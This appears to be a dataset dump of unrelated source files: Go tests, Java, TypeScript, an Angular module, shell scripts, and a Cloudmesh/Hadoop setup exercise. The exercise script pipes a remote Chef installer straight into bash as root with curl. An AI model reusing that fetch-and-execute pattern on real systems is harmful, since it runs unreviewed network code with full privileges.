text stringlengths 1 1.05M |
|---|
import { JupWhereOperator, PropertyTypeJupValues, IJupWhereNode } from "./jup.models";
/**
 * Builds a single where-clause node for a Jup filter expression.
 *
 * @param operator comparison operator applied to the column
 * @param column   name of the column being filtered
 * @param value    value the column is compared against
 * @returns a filter node combining the three pieces
 */
export function createFilter(operator: JupWhereOperator, column: string, value: PropertyTypeJupValues): IJupWhereNode {
    const node: IJupWhereNode = {
        operator: operator,
        column: column,
        value: value,
    };
    return node;
}
|
package disasm
import (
"reflect"
"testing"
)
// TestParseOpcode drives command.parseOpcode over a table of raw opcode
// bytes and checks every decoded field against the expected command.
func TestParseOpcode(t *testing.T) {
	modrmTests := []struct {
		bs   []byte
		want *command
	}{
		// add
		{[]byte{0x00, 0x00}, &command{mnem: add, l: 2, d: 0, w: 0}},
		{[]byte{0x01, 0x00}, &command{mnem: add, l: 2, d: 0, w: 1}},
		{[]byte{0x02, 0x00}, &command{mnem: add, l: 2, d: 1, w: 0}},
		{[]byte{0x03, 0x00}, &command{mnem: add, l: 2, d: 1, w: 1}},
		{[]byte{0x04, 0x00}, &command{mnem: add, l: 1, d: 0, w: 0}},
		{[]byte{0x05, 0x00}, &command{mnem: add, l: 2, d: 0, w: 1}},
		{[]byte{0x80, 0x00}, &command{mnem: add, l: 3, s: 0, w: 0}},
		{[]byte{0x81, 0x00}, &command{mnem: add, l: 4, s: 0, w: 1}},
		{[]byte{0x83, 0x00}, &command{mnem: add, l: 3, s: 1, w: 1}},
		// push
		{[]byte{0x06, 0x00}, &command{mnem: push, l: 1, reg: es}},
		{[]byte{0x0E, 0x00}, &command{mnem: push, l: 1, reg: cs}},
		{[]byte{0x16, 0x00}, &command{mnem: push, l: 1, reg: ss}},
		{[]byte{0x1E, 0x00}, &command{mnem: push, l: 1, reg: ds}},
		{[]byte{0x50, 0x00}, &command{mnem: push, l: 1, reg: ax}},
		{[]byte{0x51, 0x00}, &command{mnem: push, l: 1, reg: cx}},
		{[]byte{0x52, 0x00}, &command{mnem: push, l: 1, reg: dx}},
		{[]byte{0x53, 0x00}, &command{mnem: push, l: 1, reg: bx}},
		{[]byte{0x54, 0x00}, &command{mnem: push, l: 1, reg: sp}},
		{[]byte{0x55, 0x00}, &command{mnem: push, l: 1, reg: bp}},
		{[]byte{0x56, 0x00}, &command{mnem: push, l: 1, reg: si}},
		{[]byte{0x57, 0x00}, &command{mnem: push, l: 1, reg: di}},
		// pop
		{[]byte{0x07, 0x00}, &command{mnem: pop, l: 1, reg: es}},
		{[]byte{0x17, 0x00}, &command{mnem: pop, l: 1, reg: ss}},
		{[]byte{0x1F, 0x00}, &command{mnem: pop, l: 1, reg: ds}},
		{[]byte{0x58, 0x00}, &command{mnem: pop, l: 1, reg: ax}},
		{[]byte{0x59, 0x00}, &command{mnem: pop, l: 1, reg: cx}},
		{[]byte{0x5A, 0x00}, &command{mnem: pop, l: 1, reg: dx}},
		{[]byte{0x5B, 0x00}, &command{mnem: pop, l: 1, reg: bx}},
		{[]byte{0x5C, 0x00}, &command{mnem: pop, l: 1, reg: sp}},
		{[]byte{0x5D, 0x00}, &command{mnem: pop, l: 1, reg: bp}},
		{[]byte{0x5E, 0x00}, &command{mnem: pop, l: 1, reg: si}},
		{[]byte{0x5F, 0x00}, &command{mnem: pop, l: 1, reg: di}},
		{[]byte{0x8F, 0x00}, &command{mnem: pop, l: 2}},
		// or
		{[]byte{0x08, 0x00}, &command{mnem: or, l: 2, d: 0, w: 0}},
		{[]byte{0x09, 0x00}, &command{mnem: or, l: 2, d: 0, w: 1}},
		{[]byte{0x0A, 0x00}, &command{mnem: or, l: 2, d: 1, w: 0}},
		{[]byte{0x0B, 0x00}, &command{mnem: or, l: 2, d: 1, w: 1}},
		{[]byte{0x0C, 0x00}, &command{mnem: or, l: 1, d: 0, w: 0}},
		{[]byte{0x0D, 0x00}, &command{mnem: or, l: 2, d: 0, w: 1}},
		{[]byte{0x80, 0x08}, &command{mnem: or, l: 3, s: 0, w: 0}},
		{[]byte{0x81, 0x08}, &command{mnem: or, l: 4, s: 0, w: 1}},
		{[]byte{0x83, 0x08}, &command{mnem: or, l: 3, s: 1, w: 1}},
		// adc
		{[]byte{0x10, 0x00}, &command{mnem: adc, l: 2, d: 0, w: 0}},
		{[]byte{0x11, 0x00}, &command{mnem: adc, l: 2, d: 0, w: 1}},
		{[]byte{0x12, 0x00}, &command{mnem: adc, l: 2, d: 1, w: 0}},
		{[]byte{0x13, 0x00}, &command{mnem: adc, l: 2, d: 1, w: 1}},
		{[]byte{0x14, 0x00}, &command{mnem: adc, l: 1, d: 0, w: 0}},
		{[]byte{0x15, 0x00}, &command{mnem: adc, l: 2, d: 0, w: 1}},
		{[]byte{0x80, 0x10}, &command{mnem: adc, l: 3, s: 0, w: 0}},
		{[]byte{0x81, 0x10}, &command{mnem: adc, l: 4, s: 0, w: 1}},
		{[]byte{0x83, 0x10}, &command{mnem: adc, l: 3, s: 1, w: 1}},
		// sbb
		{[]byte{0x18, 0x00}, &command{mnem: sbb, l: 2, d: 0, w: 0}},
		{[]byte{0x19, 0x00}, &command{mnem: sbb, l: 2, d: 0, w: 1}},
		{[]byte{0x1A, 0x00}, &command{mnem: sbb, l: 2, d: 1, w: 0}},
		{[]byte{0x1B, 0x00}, &command{mnem: sbb, l: 2, d: 1, w: 1}},
		{[]byte{0x1C, 0x00}, &command{mnem: sbb, l: 1, d: 0, w: 0}},
		{[]byte{0x1D, 0x00}, &command{mnem: sbb, l: 2, d: 0, w: 1}},
		{[]byte{0x80, 0x18}, &command{mnem: sbb, l: 3, s: 0, w: 0}},
		{[]byte{0x81, 0x18}, &command{mnem: sbb, l: 4, s: 0, w: 1}},
		{[]byte{0x83, 0x18}, &command{mnem: sbb, l: 3, s: 1, w: 1}},
		// and
		{[]byte{0x20, 0x00}, &command{mnem: and, l: 2, d: 0, w: 0}},
		{[]byte{0x21, 0x00}, &command{mnem: and, l: 2, d: 0, w: 1}},
		{[]byte{0x22, 0x00}, &command{mnem: and, l: 2, d: 1, w: 0}},
		{[]byte{0x23, 0x00}, &command{mnem: and, l: 2, d: 1, w: 1}},
		{[]byte{0x24, 0x00}, &command{mnem: and, l: 1, d: 0, w: 0}},
		{[]byte{0x25, 0x00}, &command{mnem: and, l: 2, d: 0, w: 1}},
		{[]byte{0x80, 0x20}, &command{mnem: and, l: 3, s: 0, w: 0}},
		{[]byte{0x81, 0x20}, &command{mnem: and, l: 4, s: 0, w: 1}},
		{[]byte{0x83, 0x20}, &command{mnem: and, l: 3, s: 1, w: 1}},
		// daa
		{[]byte{0x27, 0x00}, &command{mnem: daa, l: 1}},
		// sub
		{[]byte{0x28, 0x00}, &command{mnem: sub, l: 2, d: 0, w: 0}},
		{[]byte{0x29, 0x00}, &command{mnem: sub, l: 2, d: 0, w: 1}},
		{[]byte{0x2A, 0x00}, &command{mnem: sub, l: 2, d: 1, w: 0}},
		{[]byte{0x2B, 0x00}, &command{mnem: sub, l: 2, d: 1, w: 1}},
		{[]byte{0x2C, 0x00}, &command{mnem: sub, l: 1, d: 0, w: 0}},
		{[]byte{0x2D, 0x00}, &command{mnem: sub, l: 2, d: 0, w: 1}},
		{[]byte{0x80, 0x28}, &command{mnem: sub, l: 3, s: 0, w: 0}},
		{[]byte{0x81, 0x28}, &command{mnem: sub, l: 4, s: 0, w: 1}},
		{[]byte{0x83, 0x28}, &command{mnem: sub, l: 3, s: 1, w: 1}},
		// das
		{[]byte{0x2F, 0x00}, &command{mnem: das, l: 1}},
		// xor
		{[]byte{0x30, 0x00}, &command{mnem: xor, l: 2, d: 0, w: 0}},
		{[]byte{0x31, 0x00}, &command{mnem: xor, l: 2, d: 0, w: 1}},
		{[]byte{0x32, 0x00}, &command{mnem: xor, l: 2, d: 1, w: 0}},
		{[]byte{0x33, 0x00}, &command{mnem: xor, l: 2, d: 1, w: 1}},
		{[]byte{0x34, 0x00}, &command{mnem: xor, l: 1, d: 0, w: 0}},
		{[]byte{0x35, 0x00}, &command{mnem: xor, l: 2, d: 0, w: 1}},
		{[]byte{0x80, 0x30}, &command{mnem: xor, l: 3, s: 0, w: 0}},
		{[]byte{0x81, 0x30}, &command{mnem: xor, l: 4, s: 0, w: 1}},
		{[]byte{0x83, 0x30}, &command{mnem: xor, l: 3, s: 1, w: 1}},
		// aaa
		{[]byte{0x37, 0x00}, &command{mnem: aaa, l: 1}},
		// cmp
		{[]byte{0x38, 0x00}, &command{mnem: cmp, l: 2, d: 0, w: 0}},
		{[]byte{0x39, 0x00}, &command{mnem: cmp, l: 2, d: 0, w: 1}},
		{[]byte{0x3A, 0x00}, &command{mnem: cmp, l: 2, d: 1, w: 0}},
		{[]byte{0x3B, 0x00}, &command{mnem: cmp, l: 2, d: 1, w: 1}},
		{[]byte{0x3C, 0x00}, &command{mnem: cmp, l: 1, d: 0, w: 0}},
		{[]byte{0x3D, 0x00}, &command{mnem: cmp, l: 2, d: 0, w: 1}},
		{[]byte{0x80, 0x38}, &command{mnem: cmp, l: 3, s: 0, w: 0}},
		{[]byte{0x81, 0x38}, &command{mnem: cmp, l: 4, s: 0, w: 1}},
		{[]byte{0x83, 0x38}, &command{mnem: cmp, l: 3, s: 1, w: 1}},
		// aas
		{[]byte{0x3F, 0x00}, &command{mnem: aas, l: 1}},
		// inc
		{[]byte{0x40, 0x00}, &command{mnem: inc, l: 1, reg: ax}},
		{[]byte{0x41, 0x00}, &command{mnem: inc, l: 1, reg: cx}},
		{[]byte{0x42, 0x00}, &command{mnem: inc, l: 1, reg: dx}},
		{[]byte{0x43, 0x00}, &command{mnem: inc, l: 1, reg: bx}},
		{[]byte{0x44, 0x00}, &command{mnem: inc, l: 1, reg: sp}},
		{[]byte{0x45, 0x00}, &command{mnem: inc, l: 1, reg: bp}},
		{[]byte{0x46, 0x00}, &command{mnem: inc, l: 1, reg: si}},
		{[]byte{0x47, 0x00}, &command{mnem: inc, l: 1, reg: di}},
		// dec
		{[]byte{0x48, 0x00}, &command{mnem: dec, l: 1, reg: ax}},
		{[]byte{0x49, 0x00}, &command{mnem: dec, l: 1, reg: cx}},
		{[]byte{0x4A, 0x00}, &command{mnem: dec, l: 1, reg: dx}},
		{[]byte{0x4B, 0x00}, &command{mnem: dec, l: 1, reg: bx}},
		{[]byte{0x4C, 0x00}, &command{mnem: dec, l: 1, reg: sp}},
		{[]byte{0x4D, 0x00}, &command{mnem: dec, l: 1, reg: bp}},
		{[]byte{0x4E, 0x00}, &command{mnem: dec, l: 1, reg: si}},
		{[]byte{0x4F, 0x00}, &command{mnem: dec, l: 1, reg: di}},
		// test
		{[]byte{0x84, 0x00}, &command{mnem: test, l: 2, w: 0}},
		{[]byte{0x85, 0x00}, &command{mnem: test, l: 2, w: 1}},
		// xchg
		{[]byte{0x86, 0x00}, &command{mnem: xchg, l: 2, w: 0}},
		{[]byte{0x87, 0x00}, &command{mnem: xchg, l: 2, w: 1}},
		{[]byte{0x91, 0x00}, &command{mnem: xchg, l: 1, reg: cx}},
		{[]byte{0x92, 0x00}, &command{mnem: xchg, l: 1, reg: dx}},
		{[]byte{0x93, 0x00}, &command{mnem: xchg, l: 1, reg: bx}},
		{[]byte{0x94, 0x00}, &command{mnem: xchg, l: 1, reg: sp}},
		{[]byte{0x95, 0x00}, &command{mnem: xchg, l: 1, reg: bp}},
		{[]byte{0x96, 0x00}, &command{mnem: xchg, l: 1, reg: si}},
		{[]byte{0x97, 0x00}, &command{mnem: xchg, l: 1, reg: di}},
		// mov
		{[]byte{0x88, 0x00}, &command{mnem: mov, l: 2, d: 0, w: 0}},
		{[]byte{0x89, 0x00}, &command{mnem: mov, l: 2, d: 0, w: 1}},
		{[]byte{0x8A, 0x00}, &command{mnem: mov, l: 2, d: 1, w: 0}},
		{[]byte{0x8B, 0x00}, &command{mnem: mov, l: 2, d: 1, w: 1}},
		{[]byte{0x8C, 0x00}, &command{mnem: mov, l: 2}},
		{[]byte{0x8E, 0x00}, &command{mnem: mov, l: 2}},
		{[]byte{0xA0, 0x00}, &command{mnem: mov, l: 3, d: 0, w: 0, reg: al}},
		{[]byte{0xA1, 0x00}, &command{mnem: mov, l: 3, d: 0, w: 1, reg: ax}},
		{[]byte{0xA2, 0x00}, &command{mnem: mov, l: 3, d: 1, w: 0, reg: al}},
		{[]byte{0xA3, 0x00}, &command{mnem: mov, l: 3, d: 1, w: 1, reg: ax}},
		// lea
		{[]byte{0x8D, 0x00}, &command{mnem: lea, l: 2}},
		// cbw
		{[]byte{0x98, 0x00}, &command{mnem: cbw, l: 1}},
		// cwd
		{[]byte{0x99, 0x00}, &command{mnem: cwd, l: 1}},
		// wait
		{[]byte{0x9B, 0x00}, &command{mnem: wait, l: 1}},
		// pushf
		{[]byte{0x9C, 0x00}, &command{mnem: pushf, l: 1}},
		// popf
		{[]byte{0x9D, 0x00}, &command{mnem: popf, l: 1}},
		// sahf
		{[]byte{0x9E, 0x00}, &command{mnem: sahf, l: 1}},
		// lahf
		{[]byte{0x9F, 0x00}, &command{mnem: lahf, l: 1}},
	}
	for _, tt := range modrmTests {
		// Decode into a fresh command for every case. Reusing one instance
		// across iterations would let fields set by a previous opcode (e.g.
		// reg) leak into the next DeepEqual comparison and cause spurious
		// failures (or hide real ones) depending on parseOpcode's resets.
		got := &command{}
		err := got.parseOpcode(tt.bs)
		if err != nil {
			t.Errorf("%v", err)
		}
		if !reflect.DeepEqual(got, tt.want) {
			t.Errorf("on %X: got %+v; want %+v", tt.bs, got, tt.want)
		}
	}
}
|
<filename>okhelper/src/main/java/com/release/okhelper/utils/LoggingInterceptor.java
package com.release.okhelper.utils;
import android.util.Log;
import java.io.IOException;
import okhttp3.Interceptor;
import okhttp3.Request;
import okhttp3.Response;
/**
* @author Mr.release
* @create 2019/4/3
* @Describe
*/
/**
 * An OkHttp {@link Interceptor} that logs the URL of each outgoing request
 * and of the response it maps back to, without modifying either.
 */
public class LoggingInterceptor implements Interceptor {
    private static final String TAG = LoggingInterceptor.class.getSimpleName();

    @Override
    public Response intercept(Chain chain) throws IOException {
        final Request outgoing = chain.request();
        Log.d(TAG, "intercept-request:" + outgoing.url());

        // Hand the request to the next interceptor / the network, then log
        // the URL recorded on the response's originating request.
        final Response incoming = chain.proceed(outgoing);
        Log.d(TAG, "intercept-response:" + incoming.request().url());
        return incoming;
    }
}
|
<gh_stars>0
package filters
import (
"sort"
"testing"
"github.com/abesto/easyssh/util"
)
// TestSupportedFilterNames verifies that SupportedFilterNames returns exactly
// the expected set of filter names (order-insensitive: both sides are sorted
// before comparing).
func TestSupportedFilterNames(t *testing.T) {
	expectedNames := []string{"coalesce", "first", "external", "ec2-instance-id", "list", "id"}
	actualNames := SupportedFilterNames()
	sort.Strings(expectedNames)
	sort.Strings(actualNames)
	// Fatal on a length mismatch: the index loop below would panic with an
	// out-of-range error if actualNames were shorter than expectedNames.
	if len(expectedNames) != len(actualNames) {
		t.Fatalf("expected %d filter names, got %d: expected=%v actual=%v",
			len(expectedNames), len(actualNames), expectedNames, actualNames)
	}
	for i := 0; i < len(expectedNames); i++ {
		if expectedNames[i] != actualNames[i] {
			t.Error(i, expectedNames[i], actualNames[i], expectedNames, actualNames)
		}
	}
}
func TestMakeFilterWrongName(t *testing.T) {
util.ExpectPanic(t, "filter \"foo-bar\" is not known", func() {
Make("(list (foo-bar))")
})
}
|
package com.qiwen.leetcode._485;
/**
 * LeetCode 485: Max Consecutive Ones.
 *
 * Given a binary array, find the maximum number of consecutive 1s in it.
 *
 * Example 1:
 *   Input:  [1,1,0,1,1,1]
 *   Output: 3
 *   Explanation: the first two and the last three digits are consecutive 1s,
 *   so the maximum number of consecutive 1s is 3.
 *
 * Notes:
 *   - The input array contains only 0 and 1.
 *   - The length of the input array is a positive integer not exceeding 10,000.
 *
 * Source: LeetCode (https://leetcode-cn.com/problems/max-consecutive-ones)
 *
 * Submission result: accepted.
 *   Runtime: 3 ms, faster than 37.71% of Java submissions.
 *   Memory:  41.2 MB, less than 5.26% of Java submissions.
 */
public class Problem485 {
    // Manual smoke test of Solution.findMaxConsecutiveOnes; for this input
    // the expected printed answer is 3 (the run of three 1s in the middle).
    public static void main(String[] args){
        int[] nums = new int[]{1,1,0,1,1,1,0,1};
        Solution solution = new Solution();
        int maxConsecutiveOnes = solution.findMaxConsecutiveOnes(nums);
        System.out.println(maxConsecutiveOnes);
    }
}
|
#!/bin/sh
# This script updates all packages and reboots the system. Intended to be set
# up on a cron in the middle of the night.

main() {
    echo "Updating Linux... the system will reboot once complete."
    update
}

# Refresh package lists, apply all upgrades, then reboot.
update() {
    sudo apt-get update
    # -y answers the confirmation prompt automatically: a cron job has no
    # terminal to answer it, so without -y the upgrade would hang forever.
    sudo apt-get upgrade -y
    sudo reboot
}

main
|
#!/usr/bin/env bash
# nbdkit
# Copyright (C) 2018-2020 Red Hat Inc.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Red Hat nor the names of its contributors may be
# used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY RED HAT AND CONTRIBUTORS ''AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL RED HAT OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
# USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
source ./functions.sh
set -e
set -x

fail=0

# Prerequisites: qemu-io as the NBD client, and a dd that understands
# iflag=count_bytes (GNU dd) for the inline plugin's pread.
requires qemu-io --version
requires dd iflag=count_bytes </dev/null

# Scratch files: a counter of plugin open() calls, and a marker file created
# by the plugin if nbdkit ever reads past the advertised size.
files="retry-size-open-count retry-size-fail"
rm -f $files
cleanup_fn rm -f $files
touch retry-size-open-count

start_t=$SECONDS

# Create a custom plugin which will test retrying.
st=0
nbdkit -v -U - \
sh - \
--filter=retry retry-delay=1 \
--run 'qemu-io -f raw -r $nbd \
-c "r 0 512" -c "r 512 512"' <<'EOF' || st=$?
#!/usr/bin/env bash
case "$1" in
open)
# Count how many times the connection is (re-)opened.
read i < retry-size-open-count
echo $((i+1)) > retry-size-open-count
;;
get_size)
# Temporarily report a smaller size
read i < retry-size-open-count
if [ $i = 2 ]; then
echo 512
else
echo 1024
fi
;;
pread)
# Fail first open unconditionally
# On second open, ensure nbdkit obyes smaller bound
# On third open, allow read to succeed
read i < retry-size-open-count
case $i in
1) echo "EIO too soon to read" >&2
exit 1 ;;
2) if [ $(( $3 + $4 )) -gt 512 ]; then
touch retry-size-fail
fi ;;
esac
dd if=/dev/zero count=$3 iflag=count_bytes
;;
*) exit 2 ;;
esac
EOF

# In this test we should see the following:
# open reports size 1024
# first pread FAILS
# retry and wait 1 second
# open reports size 512
# first pread succeeds
# second pread FAILS without calling into pread
# retry and wait 1 second
# open reports size 1024
# second pread succeeds
# The minimum time for the test should be 1+1 = 2 seconds.
end_t=$SECONDS
if [ $((end_t - start_t)) -lt 2 ]; then
echo "$0: test ran too quickly"
fail=1
fi

# Check the handle was opened 3 times (first open + reopens).
read open_count < retry-size-open-count
if [ $open_count -ne 3 ]; then
echo "$0: open-count ($open_count) != 3"
fail=1
fi

# Check that nbdkit checked bounds (the plugin creates retry-size-fail if a
# read request exceeded the 512-byte size reported on the second open).
if [ -e retry-size-fail ]; then
echo "$0: nbdkit read past EOF"
fail=1
fi

exit $fail
|
public void drawLeadingMargin(Canvas c, Paint p, int x) {
Paint.Style style = p.getStyle();
int color = p.getColor();
p.setStyle(Paint.Style.FILL);
p.setColor(lineColor);
c.drawRect(x, 0, x + lineWidth, c.getHeight(), p);
p.setStyle(style);
p.setColor(color);
} |
import { NgModule } from '@angular/core';
import { TrainingComponent } from './training.component';
import { CurrentTrainingComponent } from './current-training/current-training.component';
import { NewTrainingComponent } from './new-training/new-training.component';
import { PastTrainingsComponent } from './past-trainings/past-trainings.component';
import { StopTrainingComponent } from './current-training/stop-training.component';
import { SharedModule } from '../shared/shared.module';
import { TrainingRoutingModule } from './training-routing.module';
import { StoreModule } from '@ngrx/store';
import { trainingReducer } from './training.reducer';
// Feature module for the training area: declares every training screen and
// wires up feature routing plus the feature-scoped NgRx state slice.
@NgModule({
  declarations: [
    TrainingComponent,
    CurrentTrainingComponent,
    NewTrainingComponent,
    PastTrainingsComponent,
    StopTrainingComponent],
  // StoreModule.forFeature registers the 'training' reducer when this
  // module is loaded, so the training state slice only exists once the
  // (lazy-loaded) training feature is active.
  imports: [SharedModule, TrainingRoutingModule, StoreModule.forFeature('training', trainingReducer)],
  // StopTrainingComponent is created dynamically (as a dialog), so it must
  // be listed as an entry component.
  entryComponents: [StopTrainingComponent]
})
export class TrainingModule {}
|
# Exercise: "Deploying a Virtual Cluster with Cloudmesh"
# Try to access a master node of your cluster. (Make a screenshot)
# Create a Virtual Cluster with 2 VMs. (Make a screenshot)
# Submit two screenshots
# Activate india
cm cloud on india
cm cloud select india
cm cloud default india
# default setting
cm default image --name=futuresystems/ubuntu-14.04
cm default flavor --name=m1.small
# Create 2 virtual cluster
cm cluster create virtual_cluster_ext --count=2 --ln=ubuntu --cloud=india --flavor=m1.small --image=futuresystems/ubuntu-14.04
# In case many debugging messages appear
# cm debug off
#/cloudmesh-2.3.0-py2.7.egg/cloudmesh/iaas/openstack/cm_compute.pyc.
# Set up cluster for Hadoop
cm cloud select india
cm cloud on india
cm key default hshioi-ubuntu-vm-key0510
cm label --prefix=test_hshioi --id=1
cm default image --name=futuresystems/ubuntu-14.04
cm default flavor --name=m1.small
# Deploying Hadoop
#Chef
sudo su -
apt-get update
cd /home/ubuntu
curl -L https://www.opscode.com/chef/install.sh | bash
# Chef configuration and Cookbooks
wget http://github.com/opscode/chef-repo/tarball/master
tar -zxf master
mv *-chef-repo* chef-repo
rm master
cd chef-repo/
mkdir .chef
echo "cookbook_path [ '/home/ubuntu/chef-repo/cookbooks' ]" > .chef/knife.rb
cd cookbooks
knife cookbook site download java
knife cookbook site download apt
knife cookbook site download yum
knife cookbook site download hadoop
knife cookbook site download ohai
knife cookbook site download sysctl
tar -zxf java*
tar -zxf apt*
tar -zxf yum*
tar -zxf hadoop*
tar -zxf sysctl*
tar -zxf ohai*
rm *.tar.gz
# Customization for JAVA.rb, hadoop.rb,
cd /home/ubuntu/chef-repo/roles
nano java.rb
echo "write the below preference in 'java.r'"
# name "java"
# description "Install Oracle Java"
# default_attributes(
# "java" => {
# "install_flavor" => "oracle",
# "jdk_version" => "6",
# "set_etc_environment" => true,
# "oracle" => {
# "accept_oracle_download_terms" => true
# }
# }
# )
# run_list(
# "recipe[java]"
# )
nano hadoop.rb
# name "hadoop"
# description "set Hadoop attributes"
# default_attributes(
# "hadoop" => {
# "distribution" => "bigtop",
# "core_site" => {
# "fs.defaultFS" => "hdfs://hadoop1"
# },
# "yarn_site" => {
# "yarn.resourcemanager.hostname" => "hadoop1"
# }
# }
# )
# run_list(
# "recipe[hadoop]"
# )
cd /home/ubuntu/chef-repo
nano solo.rb
# file_cache_path "/home/ubuntu/chef-solo"
# cookbook_path "/home/ubuntu/chef-repo/cookbooks"
# role_path "/home/ubuntu/chef-repo/roles"
# verify_api_cert true
|
# ============================================================================
# Copyright (c) 2011-2012 University of Pennsylvania
# Copyright (c) 2013-2014 Andreas Schuh
# All rights reserved.
#
# See COPYING file for license information or visit
# http://opensource.andreasschuh.com/cmake-basis/download.html#license
# ============================================================================
##############################################################################
# @file config.sh
# @brief Defines constants such as the BASH version.
##############################################################################
# Include guard: define these constants only once per shell session.
[ "${_BASIS_CONFIG_INCLUDED}" == 'true' ] || {
_BASIS_CONFIG_INCLUDED='true'

## @addtogroup BasisBashUtilities
#  @{

## @brief Major version number of Bash interpreter.
# Strip everything from the first dot, e.g. "4.3.48(1)-release" -> "4".
BASH_VERSION_MAJOR=${BASH_VERSION%%.*}
## @brief Minor version number of Bash interpreter.
# First drop the major component ("3.48(1)-release"), then keep only the
# leading component before the next dot ("3").
BASH_VERSION_MINOR=${BASH_VERSION#*.}
BASH_VERSION_MINOR=${BASH_VERSION_MINOR%%.*}

readonly BASH_VERSION_MAJOR
readonly BASH_VERSION_MINOR

## @}
# end of Doxygen group
} # _BASIS_CONFIG_INCLUDED
|
<filename>api/internal/utils/json_patch_test.go<gh_stars>100-1000
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package utils
import (
"bytes"
"encoding/json"
"reflect"
"testing"
)
// compareJSON reports whether a and b are semantically equal JSON documents
// (key order and whitespace are ignored).
//
// Unmarshal errors are treated as "not equal": the previous version ignored
// them, so two *invalid* JSON strings both decoded to nil and compared equal,
// which could make a test pass on garbage output.
func compareJSON(a, b string) bool {
	var objA, objB interface{}
	if err := json.Unmarshal([]byte(a), &objA); err != nil {
		return false
	}
	if err := json.Unmarshal([]byte(b), &objB); err != nil {
		return false
	}
	return reflect.DeepEqual(objA, objB)
}
// formatJSON returns j re-indented for readable test failure output.
//
// If j is not valid JSON the input is returned unchanged; the previous
// version ignored json.Indent's error and could return a partial buffer.
func formatJSON(j string) string {
	buf := new(bytes.Buffer)
	if err := json.Indent(buf, []byte(j), "", " "); err != nil {
		return j
	}
	return buf.String()
}
// TestMergeJson exercises MergeJson over table-driven cases: a flat merge of
// scalar fields, and a merge in which an array value is replaced wholesale.
func TestMergeJson(t *testing.T) {
	cases := []struct {
		doc, patch, result, desc string
	}{
		{
			desc: "simple merge",
			doc: `{
"id": "1",
"status": 1,
"key": "fake key",
"cert": "fake cert",
"create_time": 1,
"update_time": 2
}`,
			patch: `{
"id": "1",
"status": 0,
"key": "fake key1",
"cert": "fake cert1"
}`,
			result: `{
"id": "1",
"status": 0,
"key": "fake key1",
"cert": "fake cert1",
"create_time": 1,
"update_time": 2
}`,
		},
		{
			desc: `array merge`,
			doc: `{
"uri": "/index.html",
"upstream": {
"type": "roundrobin",
"nodes": [{
"host": "172.16.58.3",
"port": 80,
"weight" : 1
}]
}
}`,
			patch: `{
"upstream": {
"nodes": [{
"host": "172.16.17.32",
"port": 80,
"weight" : 1
},{
"host": "192.168.3.11",
"port": 80,
"weight" : 1
}]
}
}`,
			result: `{
"uri": "/index.html",
"upstream": {
"type": "roundrobin",
"nodes": [{
"host": "172.16.17.32",
"port": 80,
"weight" : 1
},{
"host": "192.168.3.11",
"port": 80,
"weight" : 1
}]
}
}`,
		},
	}
	for _, c := range cases {
		out, err := MergeJson([]byte(c.doc), []byte(c.patch))
		if err != nil {
			t.Errorf("Unable to merge patch: %s", err)
			// out is not meaningful after an error; comparing it would only
			// produce a second, misleading failure for the same case.
			continue
		}
		if !compareJSON(string(out), c.result) {
			t.Errorf("Merge failed. Expected:\n%s\n\nActual:\n%s",
				formatJSON(c.result), formatJSON(string(out)))
		}
	}
}
// TestPatchJson exercises PatchJson over table-driven cases: replacing an
// existing array value, and adding a field at a previously absent path.
func TestPatchJson(t *testing.T) {
	cases := []struct {
		doc, path, value, result, desc string
	}{
		{
			desc: "patch array",
			doc: `{
"uri": "/index.html",
"upstream": {
"type": "roundrobin",
"nodes": [{
"host": "172.16.58.3",
"port": 80,
"weight" : 1
}]
}
}`,
			path: `/upstream/nodes`,
			value: `[{
"host": "172.16.17.32",
"port": 80,
"weight" : 1
},{
"host": "192.168.3.11",
"port": 80,
"weight" : 1
}]`,
			result: `{
"uri": "/index.html",
"upstream": {
"type": "roundrobin",
"nodes": [{
"host": "172.16.17.32",
"port": 80,
"weight" : 1
},{
"host": "192.168.3.11",
"port": 80,
"weight" : 1
}]
}
}`,
		},
		{
			desc: "patch field that non existent",
			doc: `{
"uri": "/index.html",
"upstream": {
"type": "roundrobin",
"nodes": [{
"host": "172.16.58.3",
"port": 80,
"weight" : 1
}]
}
}`,
			path:  `/upstream/labels`,
			value: `{"app": "test"}`,
			result: `{
"uri": "/index.html",
"upstream": {
"type": "roundrobin",
"nodes": [{
"host": "172.16.58.3",
"port": 80,
"weight" : 1
}],
"labels": {"app": "test"}
}
}`,
		},
	}
	for _, c := range cases {
		out, err := PatchJson([]byte(c.doc), c.path, c.value)
		if err != nil {
			t.Errorf("Unable to patch: %s", err)
			// out is not meaningful after an error; comparing it would only
			// produce a second, misleading failure for the same case.
			continue
		}
		if !compareJSON(string(out), c.result) {
			t.Errorf("Patch failed. Expected:\n%s\n\nActual:\n%s",
